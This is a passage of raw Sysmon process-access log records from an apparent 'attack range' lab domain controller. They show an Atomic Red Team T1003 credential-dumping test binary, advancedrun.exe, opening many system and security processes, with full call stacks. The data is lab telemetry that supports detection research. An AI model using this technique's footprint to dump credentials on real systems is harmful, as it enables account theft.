.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam